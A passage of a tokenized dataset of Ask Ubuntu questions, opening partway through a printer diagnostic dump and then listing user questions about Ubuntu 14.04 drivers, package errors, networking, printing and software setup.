, ' panel-check-type 0 ' , ' pcard-type 0 ' , ' plugin 0 ' , ' plugin-reason 0 ' , ' power-settings 0 ' , ' ppd-name lj_300_400_color_m351_m451 ' , ' pq-diag-type 0 ' , ' r-type 0 ' , ' r0-agent1-kind 4 ' , ' r0-agent1-sku ce410a/ce410x ' , ' r0-agent1-type 1 ' , ' r0-agent2-kind 4 ' , ' r0-agent2-sku ce411a ' , ' r0-agent2-type 4 ' , ' r0-agent3-kind 4 ' , ' r0-agent3-sku ce413a ' , ' r0-agent3-type 5 ' , ' r0-agent4-kind 4 ' , ' r0-agent4-sku ce412a ' , ' r0-agent4-type 6 ' , ' scan-src 0 ' , ' scan-type 0 ' , ' status-battery-check 0 ' , ' status-dynamic-counters 0 ' , ' status-type 3 ' , ' support-released true ' , ' support-subtype 2202411 ' , ' support-type 2 ' , ' support-ver 3.12.2 ' , `` tech-class [ 'postscript ' ] `` , `` tech-subclass [ 'normal ' ] `` , ' tech-type 4 ' , ' usb-pid 3882 ' , ' usb-vid 1008 ' , ' wifi-config 0 ' , '\x1b [ 01m ' , 'status history ( most recent first ) : \x1b [ 0m ' , '\x1b [ 01m date/time code status description user job id \x1b [ 0m ' , ' -- -- -- -- -- -- -- -- -- -- -- -- - -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ' , ' 08/21/14 00:07:25 5012 device communication error richard 0 ' , ' 08/20/14 13:42:44 500 started a print job richard 4214 ' , '' , '' , 'done . ' , '' ] , [ '\x1b [ 35 ; 01mwarning : no display found.\x1b [ 0m ' , '\x1b [ 31 ; 01merror : hp-info -u/ -- gui requires qt4 gui support . entering interactive mode.\x1b [ 0m ' , '\x1b [ 31 ; 01merror : unable to communicate with device ( code=12 ) : hp : /usb/hp_laserjet_400_color_m451dn ? serial=cnff308670\x1b [ 0m ' , '\x1b [ 31 ; 01merror : error opening device ( device not found ) .\x1b [ 0m ' , '' ] , 0 ) , 'is_cups_class ' : false , 'local_cups_queue_attributes ' : { 'charset-configured ' : u'utf-8 ' , 'charset-supported ' : [ u'us-ascii ' , u'utf-8 ' ] , 'color-supported ' : true , 'compression-supported ' : [ u'none ' , u'gzip ' ] , 'copies-default ' : 1 , 'copies-supported ' : ( 1 , 9999 ) , 'cups-version ' : u'1.7.2 ' , 'device-uri ' : u'hp : /usb/hp_laserjet_400_color_m451dn ? serial=cnff308670 ' , 'document-format-default ' : u'application/octet-stream ' , 'document-format-supported ' : [ u'application/octet-stream ' , u'application/pdf ' , u'application/postscript ' , u'application/vnd.adobe-reader-postscript ' , u'application/vnd.cups-command ' , u'application/vnd.cups-pdf ' , u'application/vnd.cups-pdf-banner ' , u'application/vnd.cups-postscript ' , u'application/vnd.cups-raw ' , u'application/vnd.samsung-ps ' , u'application/x-cshell ' , u'application/x-csource ' , u'application/x-perl ' , u'application/x-shell ' , u'image/gif ' , u'image/jpeg ' , u'image/png ' , u'image/tiff ' , u'image/urf ' , u'image/x-bitmap ' , u'image/x-photocd ' , u'image/x-portable-anymap ' , u'image/x-portable-bitmap ' , u'image/x-portable-graymap ' , u'image/x-portable-pixmap ' , u'image/x-sgi-rgb ' , u'image/x-sun-raster ' , u'image/x-xbitmap ' , u'image/x-xpixmap ' , u'image/x-xwindowdump ' , u'text/css ' , u'text/html ' , u'text/plain ' ] , 'finishings-default ' : 3 , 'finishings-supported ' : [ 3 ] , 'generated-natural-language-supported ' : [ u'en-us ' ] , 'ipp-versions-supported ' : [ u'1.0 ' , u'1.1 ' , u'2.0 ' , u'2.1 ' ] , 'ippget-event-life ' : 15 , 'job-creation-attributes-supported ' : [ u'copies ' , u'finishings ' , u'ipp-attribute-fidelity ' , u'job-hold-until ' , u'job-name ' , u'job-priority ' , u'job-sheets ' , u'media ' , u'media-col ' , u'multiple-document-handling ' , u'number-up ' , u'output-bin ' , u'orientation-requested ' , u'page-ranges ' , u'print-color-mode ' , u'print-quality ' , u'printer-resolution ' , u'sides ' ] , 'job-hold-until-default ' : u'no-hold ' , 'job-hold-until-supported ' : [ u'no-hold ' , u'indefinite ' , u'day-time ' , u'evening ' , u'night ' , u'second-shift ' , u'third-shift ' , u'weekend ' ] , 'job-ids-supported ' : true , 'job-k-limit ' : 0 , 'job-k-octets-supported ' : ( 0 , 470914416 ) , 'job-page-limit ' : 0 , 'job-priority-default ' : 50 , 'job-priority-supported ' : [ 100 ] , 'job-quota-period ' : 0 , 'job-settable-attributes-supported ' : [ u'copies ' , u'finishings ' , u'job-hold-until ' , u'job-name ' , u'job-priority ' , u'media ' , u'media-col ' , u'multiple-document-handling ' , u'number-up ' , u'output-bin ' , u'orientation-requested ' , u'page-ranges ' , u'print-color-mode ' , u'print-quality ' , u'printer-resolution ' , u'sides ' ] , 'job-sheets-default ' : ( u'none ' , u'none ' ) , 'job-sheets-supported ' : [ u'none ' , u'classified ' , u'confidential ' , u'form ' , u'secret ' , u'standard ' , u'topsecret ' , u'unclassified ' ] , 'jpeg-k-octets-supported ' : ( 0 , 470914416 ) , 'jpeg-x-dimension-supported ' : ( 0 , 65535 ) , 'jpeg-y-dimension-supported ' : ( 1 , 65535 ) , 'marker-change-time ' : 0 , 'media-bottom-margin-supported ' : [ 423 ] , 'media-col-default ' : u ' ( unknown ipp value tag 0x34 ) ' , 'media-col-supported ' : [ u'media-bottom-margin ' , u'media-left-margin ' , u'media-right-margin ' , u'media-size ' , u'media-source ' , u'media-top-margin ' , u'media-type ' ] , 'media-default ' : u'iso_a4_210x297mm ' , 'media-left-margin-supported ' : [ 423 ] , 'media-right-margin-supported ' : [ 423 ] ,
514020	network traffic monitoring for unexperienced users	i 'm a really unexperienced ubuntu user and i 'm having a hard time monitoring my network traffic . i just need to know what websites each one of the devices connected to my network are accessing . i 've tried to use ntop , but i could n't work around it . is that possible ? i mean , is it possible to know that kind of data only by specifing a local ip address ? how can i do that ? it 's a security issue that i 'm facing and i need to work that `` easy '' monitoring out . thanks
514022	lost video after getting into the system	i installed ubuntu 14.04 in another machine , everything look normal during installation on the screen . i remove the installation cd ( because ubuntu ask for ) . the system restart normal without ubuntu cd , until the first screen where it ask for passwords of any users . as soon as you type the password and hit enter , the screen flickers and you do n't see anything normal no more , so from this point on nothing you can do in the computer ... do you have any suggestions ? thanks ! ! !
514024	small blank software updater window	this just recently started happening , and i 'm not sure why . does n't bother me too much , as i usually apt-get update/upgrade when needed , but it is kind of annoying . just curious if anyone has seen this , and/or knows how to fix this .
514025	usb and dvd booting problem	so i have been trying to boot ubuntu linux from my usb drive and dvd . both have failed . at first both seemed to be working fine . they both brought up the ubuntu set up and i actually went through about four screens , but when i chose to install ubuntu inside of windows ( which is the correct option ) my computer screen immediately went black and it said `` remove all bootable devices and press enter . '' it then starts up windows like nothing even happened . does anyone know how to fix this problem ? if it helps i have an hp probook 450 g1 with an i7 processor .
514026	does the redragon mammoth mouse compatible with ubuntu ?	http : //www.amazon.com/redragon-mammoth-precision-programmable-cartridge-switches/dp/b00gu4f4om/ref=cm_cd_ql_qh_dp_t i was thinking of getting it and i do have a windows 8 laptop to configure it .
514027	forgot password	i have a dell mini that would not boot to unbutu . it sat in my closet for over a year and a half . my son wanted a laptop , so i decided to try and fix it . with the help of this website and adding rootedelay=130 it finally booted but now it 's asking for the key ring password which i ca n't remember cause it 's been so long since i 've used it . i 'd very much appreciate any help in resetting the password . thank you in advance for any help .
514028	ibus input method preferences window not showing in ubuntu 14.04	after installing ibus and pinyin input method , i want to set the preferences for this particular input method . it should be something like `` using traditional characters in the ibus pinyin ime '' in this webpage . but when i click the `` preferences '' button in the floating window , as shown below , nothing appears . clicking on ibus icon and then `` preferences '' does not work as well . i tried with pinyin and sunpinyin , but neither gives a pop-up window . i 'm expecting to a `` shuangpin '' option in that window . it 's something like this problem but i 'm running on a recently installed ubuntu 14.04 , xfce4 , in a crouton environment . how can i get the `` preference '' window pop up ? please note that i can type chinese with pinyin input method . i just want to configure the preferences for that particular input method , so the problem is n't about how to install ibus or installing an input method .
514034	forgetten to click space bar on burg install	i got some info about burg here and i wanted to install it to my pc . i used the following commands to install it : sudo add-apt-repository -y ppa : n-muench/burg sudo apt-get update sudo apt-get install burg burg-themes unfortunately i have forgotten to hit space bar while selecting my boot hd . help me select my boot hd .
514035	upgrade scipy to the latest version	i am running ubuntu 14.04 . i have scipy 0.13.3 and i would like to upgrade it . i have tried : sudo pip3 install scipy -- upgrade but i receive this error : creating build/lib.linux-x86_64-3.4/scipy/_build_utils copying scipy/_build_utils/__init__.py - > build/lib.linux-x86_64-3.4/scipy/_build_utils copying scipy/_build_utils/_fortran.py - > build/lib.linux-x86_64-3.4/scipy/_build_utils running build_clib customize unixccompiler customize unixccompiler using build_clib building 'dfftpack ' library running from scipy source directory . `` object of type 'type ' has no len ( ) '' in evaluating 'len ( list ) ' ( available names : [ ] ) '' object of type 'type ' has no len ( ) '' in evaluating 'len ( list ) ' ( available names : [ ] ) '' object of type 'type ' has no len ( ) '' in evaluating 'len ( list ) ' ( available names : [ ] ) '' object of type 'type ' has no len ( ) '' in evaluating 'len ( list ) ' ( available names : [ ] ) '' object of type 'type ' has no len ( ) '' in evaluating 'len ( list ) ' ( available names : [ ] ) '' object of type 'type ' has no len ( ) '' in evaluating 'len ( list ) ' ( available names : [ ] ) error : library dfftpack has fortran sources but no fortran compiler found -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- rolling back uninstall of scipy cleaning up ... command /usr/bin/python3 -c `` import setuptools , tokenize ; __file__='/tmp/pip_build_root/scipy/setup.py ' ; exec ( compile ( getattr ( tokenize , 'open ' , open ) ( __file__ ) .read ( ) .replace ( '\r\n ' , '\n ' ) , file__ , 'exec ' ) ) '' install -- record /tmp/pip-h0l8itnj-record/install-record.txt -- single-version-externally-managed -- compile failed with error code 1 in /tmp/pip_build_root/scipy storing debug log for failure in /home/donbeo/.pip/pip.log donbeo @ donbeo-hp-elitebook-folio-9470m : ~ $ python3 how can i solve this ? i am working on an almost fresh installation of ubuntu 14.04 .
514036	unable to write to /var/log/btmp	i recently had a bunch of entries in my btmp log [ because of a boneheaded move on my part ] i resolved the issue , but now i would like to clear that log , i copied it somewhere else for reference and then i attempted to null the file , but to no avail . i then checked the permissions for the file itself and everything looks right ? just unsure of why it will not let sudo access the file . user @ localhost : ~ $ sudo cat /dev/null > /var/log/btmp -bash : /var/log/btmp : permission denied user @ localhost : ~ $ ls -a -l /var/log/btmp -rw-rw -- -- 1 root utmp 5502336 aug 20 18:59 /var/log/btmp just looking for some other ideas.. i tried changing the permissions and then changing them back just because . i also tried a few other ways to remove the text . but i want to figure out why this does n't just work . thanks for any help !
514039	displaylink usb dvi adapter recognized as cd-rom , no signal output for ubuntu 14.04	i am using this trulink 30359 which has a displaylink chip . http : //www.ebay.com/itm/121402269836 ? sspagename=strk : mewnx : it & _trksid=p3984.m1497.l2649 to explain what happened in my ubuntu 14.04 with it , i will first explain what happened in my windows 7 pro . when the device was connected to windows 7 , it was recognized as an optical drive ( also a usb mass storage device was found ) , and a drive letter corresponding to it appeared in `` computer '' , which contained an outdated version of the displaylink driver . this outdated version would cause my windows 7 to crash when the adapter was connected , so i changed to newer driver downloaded from displaylink official website for windows 7 support . after driver was installed ( no matter it was the correct newer one , or the problematic outdated one , the optical device would disappear , and the monitor device would show up in device manager . the story above is what happened in windows 7 . now let 's come to ubuntu 14.04 . since my computer has dualboot systems , i also tried the device in ubuntu 14.04 but got no luck . after the adapter was attached , no green screen was observed . the monitor connected to the adapter stayed black with led orange ( which i think means no signal ) . i tried un-blacklisting 'udlfb ' but no effect . i tried upgrading kernel but no effect . 'xrandr -- listprovider ' reported that there was only one provider . what 's worse , 'dmesg ' told me that only an optical device was found ( named sr0 ) , no information for any framebuffer though . i guess the device i bought has some strange mechanism built-in , that only when some specific windows driver is installed will it appear as a monitor . absolutely the windows driver can not be installed on ubuntu but then how can i use this device in ubuntu 14.04 ? if you need more details , i am ok to provide with them .
514042	burn full installation to disk	i am running ubuntu as a virtual machine . but i am starting to really enjoy it ! so what i want to do is to somehow take the full installation ( with all my files , settings , etc ) and make it into an .iso file to then burn it to a disk and be able to run it as a primary system . is there a way to do that ?
514043	unable to connect to wifi	my ubuntu laptop can not connect to wifi automatically . i have to restart my laptop for more than one time to connect to wifi.what could be the problem ?
514045	microsoft onenote alternative with support for my stylus	i know how many questions about onenote alternatives and i read through them but did n't find something fitting for me . so what am i looking for ? support for my stylus / hand written notes adding files/pictures to the notes some managing system to organize the notes / somewhat like onenote
514046	how to have the intallation file actually work	i 've never even been able to get ubuntu to work . . . and i 've tried multiple times . current iteration : wo n't run as its own program ( always wants to copy to a disc ) , wo n't copy to a disc ( speaking of ubuntu glitches , the file is too big for a disc ) , and if i zip file it , it fits on a disc but wo n't run . yes , the windows tax is a necessary evil .
514049	how to make inkscape remember its previous window size ?	every time i start inkscape , no matter what , it starts up in an unusably small window . each and every other program i use remembers its window size . why wo n't inkscape ? is there a way to force inkscape to do so ?
514050	`` e : the package lists or status file could not be parsed or opened . '' after deleting one of the list files	i 'm really stupid , and i deleted the following file : us.archive.ubuntu.com_ubuntu_dists_trusty_main_i18n_translation-en i did so attempting to do something about the following error message : error : opening the cache ( e : encountered a section with no package : header , e : problem with mergelist/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_trusty_main_i18n_translation-en , e : the package lists or status file could not be parsed or opened . ) i attempted to fix it with sudo apt-get update , but i am told package lists or status file could not be parsed or opened ubuntu software center or software updater will not open either . i 'm not sure if this is related
514053	how to watch a video cropped and ratio resized/scaled ?	can i watch only a half region of a video with the ratio scaled ? as with the illustration , i want to watch a perfect circle instead of an oval and i want the ads removed . scaling the media player window and placing it out of the screen maybe hides the ads , but it will also hide the subtitle . on-the-fly transcoding is preferred ( maybe vlc can do it ? ) because transcoding the file may take a long time and may reduce the video quality . but if it can not , transcoding the file with command line is also welcomed as long as the video quality is kept : ) .
514055	is .gnupg vital when upgrading 12.04 to 14.04.1	my `` /home/owlsglobal/.gnupg '' as not been getting 'backed up ' for several months . ( no idea why it stopped working . ) might an upgrade from 12.04 to 14.04.1 solve this problem , or should i solve this problem before risking an upgrade ? thanks !
514057	confusion for mime files : magic , magic.mgc , magic.mime	i 'm using ubuntu . i 'm trying to use ruby gem 'shared-mime-info ' for an application i 'm writing . i understand that magic.mgc is a compiled version of magic file which has magic number definitions for the different file types . but i do n't understand why is it /usr/share/mime/magic is in binary format instead of just normal text file with each parameters separated by white space like everywhere else i 'm finding on the internet when it 's referencing this file ? the /usr/share/mime/magic has the word 'mime-magic ' at the beginning of the file and prioritize the rest of the stuff like . so it does n't look like magic.mgc at all . [ 100 : application/vnd.scribus ] > 1=^ @ ^kscribusutf8 [ 90 : application/vnd.stardivision.writer ] > 2089=^ @ shared-mime-info seems to want a magic file in the binary non compiled format as above and i wanted to add definition for docx but how does one update or generate this file without using a hex editor ? there is a reference to the magic file i found at : http : //standards.freedesktop.org/shared-mime-info-spec/shared-mime-info-spec-latest.html and it mention this file is updated with update-mime-database but what if i just want to add some new entry to it . hex editor ? anyway i ended up using hexer to make a new magic file in ~/.local/share/mime/ with only the entry i wanted to add and the mime-magic header . seems to work ( assuming i will ever deal with docx for now ) . 00000000 : 4d 49 4d 45 2d 4d 61 67 69 63 00 0a 5b 36 30 3a mime-magic.. [ 60 : 00000010 : 61 70 70 6c 69 63 61 74 69 6f 6e 2f 76 6e 64 2e application/vnd . 00000020 : 6f 70 65 6e 78 6d 6c 66 6f 72 6d 61 74 73 2d 6f openxmlformats-o 00000030 : 66 66 69 63 65 64 6f 63 75 6d 65 6e 74 2e 77 6f fficedocument.wo 00000040 : 72 64 70 72 6f 63 65 73 73 69 6e 67 6d 6c 2e 64 rdprocessingml.d 00000050 : 6f 63 75 6d 65 6e 74 5d 0a 3e 30 3d 00 08 50 4b ocument ] . > 0=..pk 00000060 : 03 04 14 00 06 00 0a -- -- -- -- -- -- -- -- -- ... ... . -- -- -- -- -
514059	intel graphics driver installer , now the cpu fan is rarely quiet	i have an optimus chipset : intel hd 4000 ( i7-3635qm cpu ) geforce 640m i do n't care about the nvidia card , so i did n't try to install any proprietary drivers for it . so : i was having a choppy+high cpu experience with gnome-shell on ubuntu 14.04 . only happened when i tried moving a window around quickly . i used the intel graphics installer hoping that it will fix the problem . it did fix the problem , now there is no choppyness or high cpu when i move windows around . however , there is a new problem now : the fan is rarely quiet , doing barely anything at all will cause the fan to go into loud mode quickly . that happens despite the cpu usage being at just around 4 % . this was n't the case before installing intel drivers . it would normally only do that if , for example , i 'm installing packages or doing something that puts some stress on the cpu . i set all cpu cores to `` powersave '' using cpufreq-set , but nothing changed . also on windows , the fans are really quiet when i 'm in powersave mode . i believe they completely shut off for most of the time . i remember the installer giving me a report at the end as to which packages it installed . unfortunately , i did n't save the report and i do n't know where it would have saved it if it did . any ideas or similar experiences ?
514060	a4teck webcam not working in 12.04	webcam make : a4teck model not known . this works with windowsxp sp3 with skype video calls . after installing ubuntu 12.04 dual boot it 's not working . whilst running the installation camera came up . but with skype no video calls option . can you advise .
514062	debugging random reboots	i 'm running ubuntu 14.04 with 3.16.1 kernel compiled from source , and when i leave my pc running for a long time , it always reboots after about 4-8 days . nothing is displayed on the screen , everything just freezes for about 3 seconds ( and if there was any sound playing , it keeps repeating over and over ) , and then reboots . this issue also affects kernels compiled by canonical 's build bots . i already tried to debug it with : rsyslog kexec-tools netconsole kernel module none of them seem to be working however . are there any better methods to check , what exactly fails here ? if there 's an issue with ram for example , should n't kernel report this in dmesg , or cause a kernel panic ?
514063	dnscrypt-proxy specific usage	i have some specific usage questions about dnscrypt-proxy . i followed a guide and ended with the command dnscrypt-proxy -- daemonize âuser=dnscrypt without any further switches does it default to using opendns 's resolver server ? i want to use specific servers , i found reference to pointing it to the full path of a csv file . what is the csv format for use with dnscrypt ? the header of dnscrypt-resolvers.csv from github is name , full name , description , location , coordinates , url , version , dnssec validation , no logs , namecoin , resolver address , provider name , provider public key , provider public key txt record does dnscrypt really read all those fields or are some just for human reference only ? ive been using -- test=0 to see if i can whittle down to a basic format and so far i got name , resolver address , provider name , provider public key still uncertain if i need the other fields . also that needs to be the header , ca n't have it blank or have a resolver entry as the first line .
514064	disabled wifi but it keeps re-enabling itself ; want it to stay disabled	i have an alienware x51 desktop with a wireless card , i have it connected via ethernet and want to permanently disable wifi from ever using itself . when running windows , i go to device manager and rightclick-disable the wireless card and that takes care of my problem . is there a similar method using ubuntu 14.04 ? for now , i click on the network icon in the system tray and uncheck 'enable wifi ' but it seems to turn itself back on as i use my computer , i think i have the incident isolated to something with steam . it seems like after i start the steam client it always is re-enabled . hopeful answer : just disable/remove/block wireless card from ever working . edit : ok , it is official , the game client steam is enabling wifi every single time i launch it , even after going to settings > network > wireless > disable & airplane mode on . any idea why the client is activating wifi when i have a perfectly good ethernet connection ?
514066	ubuntu 14.04 has a bunch of old kernel directories	i saw in disk usage analyzer i have 3.13.0-xx for 8 minor versions of the kernel in /lib/modules . each is around 200mb . i remember having to go through in synaptic and remove those old linux versions before , but has n't this bug been fixed ? is it just paranoid default setting , that perhaps all of the last half dozen kernels might become unbootable , so it keeps each old one around ? or do i have some developer setting enabled by accident that causes this ?
514071	how can i patch a ppa and then upload the patched source to my ppa ?	i 'm trying to do something very simple but i 'm having a lot of problems . i am trying to have a patched wine ppa . i want to download the wine1.7 ppa source from the ubuntu team ppa , apply 1 patch file , and upload the patched source to my ppa to be built . i 'm getting the source with apt-get source wine1.7 . that part is fine . i have tried using quilt , but that does n't help . my ppa builds fine . the problem is , it never has my patch applied to the binaries . how can i patch a ppa and upload the patched source to my ppa to be built ? thanks
514072	blank cacti graphs	i 'm running ubuntu 14.04 lts and i 'm having an issue with cacti 0.8.8b not displaying any data in graphs . the graphs are being created and i see files in /var/lib/cacti/rra . my crontab entry for root is the following : */1 * * * * sudo -u www-data php -q /usr/share/cacti/site/poller.php > /dev/null the output of ls -la /var/lib/cacti/rra is the following : # ls -la /var/lib/cacti/rra/ total 1008 drwxrwx -- - 2 www-data www-data 4096 aug 20 19:27 . drwxr-xr-x 3 www-data www-data 4096 aug 17 01:41 .. -rw-r -- r -- 1 www-data www-data 47992 aug 20 19:23 tortib_com_cpu_nice_34.rrd -rw-r -- r -- 1 www-data www-data 47992 aug 20 19:24 tortib_com_cpu_system_35.rrd -rw-rw-r -- 1 www-data www-data 47992 aug 20 19:25 tortib_com_cpu_user_36.rrd -rw-r -- r -- 1 www-data www-data 94816 aug 20 19:27 tortib_com_hdd_used_43.rrd -rw-r -- r -- 1 www-data www-data 94816 aug 20 19:23 tortib_com_hdd_used_44.rrd -rw-r -- r -- 1 www-data www-data 47992 aug 20 19:27 tortib_com_load_15min_38.rrd -rw-r -- r -- 1 www-data www-data 47992 aug 20 19:26 tortib_com_load_1min_37.rrd -rw-r -- r -- 1 www-data www-data 47992 aug 20 19:23 tortib_com_load_5min_39.rrd -rw-r -- r -- 1 www-data www-data 47992 aug 20 19:24 tortib_com_mem_buffers_40.rrd -rw-rw-r -- 1 www-data www-data 47992 aug 20 19:25 tortib_com_mem_cache_41.rrd -rw-r -- r -- 1 www-data www-data 47992 aug 20 19:26 tortib_com_mem_free_42.rrd -rw-r -- r -- 1 www-data www-data 94816 aug 20 19:24 tortib_com_traffic_in_45.rrd -rw-rw-r -- 1 www-data www-data 94816 aug 20 19:25 tortib_com_traffic_in_46.rrd -rw-r -- r -- 1 www-data www-data 94816 aug 20 19:26 tortib_com_traffic_in_47.rrd -rw-r -- r -- 1 www-data www-data 47992 aug 20 19:27 tortib_com_users_48.rrd i tried to run the poller as root from the command line but it does n't output anything useful nor does it graph any data . the device in cacti shows that that it 's able to query snmp and ping is alive . the graphs are still empty though . snmpwalk 127.0.0.1 -v2c -c public works as it should . it walks all mibs . i 'm quite perplexed as to why this is n't working any longer . it was graphing data but then it just stopped . and when it was graphing data it was graphing it intermittently . thank you for reading this problem and helping .
514073	computer sometimes recognizes when headphones are plugged in .	whenever i plug my headphones into my computer 's front headphone jack , i get a weird situation . sometimes , the computer will recognize the headphones and work properly . but other times , the computer will play sound through both the headphones and my monitor 's speaker . when this happens , the sound section of the system settings does not list the headphones . i can fix the issue temporarily by wiggling the headphone port , but if it gets wiggled the wrong way again , then the issue returns . my pc 's case is a rosewill challenger . i have tried multiple headphones and the same issue is there . i suspect that this might be a hardware related issue , but if there is any way to fix it with software , that would be helpful . this is what it looks like when everything is working properly : this happens when i wiggle the headphone port . i can quickly switch between these two by doing so :
514077	after renaming a file the ubuntu 14.04 program `` files '' sorts alphanumerically and displays location of new/corrected file name . can that be disabled ?	i looked in ubuntu 14.04 and i could not find a option to disable a awkward feature that made extra work for me . after renaming a file then the program `` files , version 3.10.1 '' reorganizes alphanumerically and then automatically moves the prompt/cursor/highlighting to the new file name at the new alphanumerical location . it 's much easier and practical if the working cursor remains in the same area where the file was found that needed name changes or needed name spelling corrections . windows 7 does what i ask about and it 's a huge improvement over that auto sort and then go to the new file location . a example to consider is a file is in the `` a '' area and then you rename it to a `` z '' and you are then taken to the `` z '' stuff and need to scroll hundreds of lines back to the `` a '' section . it 's annoying . thanks for reading and taking the time .
514079	avast not up to quality ?	when i follow this guide : http : //howtoubuntu.org/how-to-install-and-update-avast-antivirus-in-ubuntu # .uvro9vgju1e it says the .deb isnât up quality code in the ubuntusoftwarecenter ! i do n't know to trust this guide or not ! help ( someone who has done this ! ) .
514082	blank black screen with kernels newer than 3.8.0-19	i currently get a blank black screen with latest kernels . even moving to any of the terminals ( using alt+ctrl+f1 ) is not possible . i have tried both ubuntu and linux mint , with the same result . i am not sure of the reason , but it seems like the video card . the card is : vga compatible controller : advanced micro devices , inc. [ amd/ati ] rs880 [ radeon hd 4250 ] i have gone through various forums but did not find any solution . it seems like amd has stopped maintenance of the driver and open source drivers do n't work on my machine . please share any solution , if there is one or share some suggestions on a good video card that i can buy .
514085	ubuntu 14.04 lts desktop on a virtual machine	i have a running ubuntu 12.04 lts desktop on a virtual machine . i wanted to upgrade it to 14.04 but i got this warnning : your graphics hardware may not be fully supported in ubuntu 14.04 when i checked the link : https : //wiki.ubuntu.com/x/bugs/updatemanagerwarningforunity3d it says this could happen because of virtual machines . i can wait for now but my question is , is this permanent or would be supported soon ?
514088	indicators do not appear at unity panel	i noticed that applications indicators are no longer appear at the unity panel , only default ones ( language , sound , battery ... ) are displayed . when i try to load system load indicator from terminal , i get this message : gdbus.error : org.freedesktop.dbus.error.notsupported : application does not handle command line arguments
514089	music players keeps opening automatically on ubuntu 14.04	rythymbox and vlc keep opening themselves automatically when neither is installed . can only stop this by uninstalling the music player . i can click the close x or quit but it will open again shortly . how can i stop this
514090	why does ubuntu take so much time to update libreoffice to the latest bug fix releases ?	i have noticed that , since ubuntu ships libreoffice as its default office suite , it takes ages for it to deliver updates to subsequently released bug fix releases . for example , ubuntu 14.04 still has lo 4.2.4 even though 4.2.6 was released two weeks ago ( and 4.2.5 before that ) . lo 's bug fix releases are very unlikely to break anything , and they add to the software 's stability ( 272 bugs and reports closed between 4.2.4 and 4.2.6 ! ) . why does it take so long for official repos de offer a stability update to one of the flagship ubuntu apps ?
514091	i wish to automate vm installation in kvm how do i ?	i wish to automate vm installation in kvm how do i ? my setup is as follows : host server : ubuntu 12.04 64 bit ram : 48 gb hdd : 800 gb cpu : 24 i wish to install virtual machines using automation ( one click ) . all the servers will be of ubuntu 12.04 . with different purpose . i checked rundeck but was unable to get clear idea of doing a vm installation using the same . i also checked puppetlabs but again not much of a success . has anyone done a automated installations using any tools ? suggestions are welcome .
514092	keyboard up- down-arrowkeys do not respond from browser address bar	if on the address bar , the up and down arrow keys do n't respond neither in firefox nor chromium this problem started after an upgrade to ubuntu 14.04
514094	how do i install wayland and use it ?	i was watching this video . how do i get weston on ubuntu to try it ? where can i find other desktop environments that work with wayland - are there any wayland ports for it like gnome and kde ?
514095	getting kyocera taskalfa printer working with job accounting	i 'm working in an office that has a kyocera taskalfa300i . it has a job accounting system -- when i take a memory stick to it to print that way , i have to input my personal code , which charges the cost of paper to my project . the ppd is here , which i installed via cups . i can send jobs to the machine , but it throws an error that the job accounting code is wrong . colleagues with windows get a popup prompting for the code , but i do n't . anyone know how to get this working ?
514098	open screen and run some projects and applications	i am a python web developer , i need to run my local 3-4 django projects in screen sessions and need to launch some of my applications like skype , chrome , eclipse and a text file daily status.txt . is there any way to write a script to launch all of them by running a shell script only ? # ! /bin/bash # gnome-terminal -e `` screen -dms myapps '' # ( attach following command to one of the screen ) cd /var/opt/project1 python manage.py runserver 127.0.0.1:8001 # ( attach another command to one of the screen ) cd /var/opt/project2 python manage.py runserver 127.0.0.1:8002 # ( attach another command to one of the screen ) cd /var/opt/project3 python manage.py runserver 127.0.0.1:8003 # start my applications eclipse skype gedit `` /home/myname/desktop/daily status.txt '' [ ... ] can one help me to write a shell script to do this .
514100	ubuntu 12.04 + mono : can not find windows forms	i am running ubuntu 12.04 lts . i need to run a mono environment application ( which needs windows forms ) . i have installed mono runtime , from badgerports.org , version : mono-runtime 3.2.8+dfsg-4~dhx1+precise1 . when i go : mono application.exe it bumps with : could not load file or assembly 'system.windows.forms , version=2.0.0.0 , culture=neutral , publickeytoken=b77a5c561934e089 ' or one of its dependencies . i have then installed : libmono-winforms2.0-cil 3.2.8+dfsg-4~dhx1+precise1 but when running again : mono application.exe i am getting the same error message as before : could not load file or assembly 'system.windows.forms , version=2.0.0.0 , culture=neutral , publickeytoken=b77a5c561934e089 ' or one of its dependencies . help will be appreciated nb : should i find where the library has been downloaded ( how ) ? and then install it into mono gac using gacutil ( how ? ? ) note : cross=-posted at : stackoverflow
514102	problem with libc.so.6 while executin apt-get	when i try to update in terminal , sudo apt-get update i am getting response as , apt-get : /lib/i386-linux-gnu/libc.so.6 : version 'glibc_2.18 ' not found ( required by /usr/lib/i386-linux-gnu/libstdc++.so.6 ) how to solve it ?
514103	regarding sites that require newest version of `` flash ''	i am new to linux . please forgive my ignorance . i just installed ubuntu 14.04 so far i like it , although there is a learning curve . however i am having an issue with one particular video site that i used regularly in windows . when i visit it now , it asks me to upgrade my flash version in order for the videos to play . however when i visit adobe it confirms that i am running the last version for linux . how do i get around the website asking for a particular version ?
514105	compare strings in two files	i am trying to get the name of the user from one file and their corresponding details from my other file . i use awk : awk -f : ' { print $ 1 } ' user-name it gives me the list of all the user 's . so now how can i match these names with the other file and get a output like : user-name id contact-details the format of the two files is like follows : 1.user-name tarun:143 rahul:148 neeraj:149 2.user-details tarun : tarun @ gmail.com neeraj : neeraj @ xyz.com rahul : rahul @ gmail.com what i 'm trying to get is like : neeraj:149 : neeraj @ xyz.com rahul:148 : rahul @ gmail.com tarun:143 : tarun @ gmail.com
514106	ubuntu stopped playing .wmv files	i installed restricted access and vlc ( which carries its own codecs i believe ) , and still all wmv files are refusing to play . avi , mp4 , and seemingly everything else works fine though
514107	auto mount encrypted fs with grub2	i have been looking for a way to mount my encrypted partitions automatically during boot up , without asking for password . my setup for this process.. usb key : /boot partition /boot/efi partition system : encrypted / ( root ) partition encrypted /home partition encrypted volumes where created with `` cryptsetup -y -v luksformat /dev/xxx ''
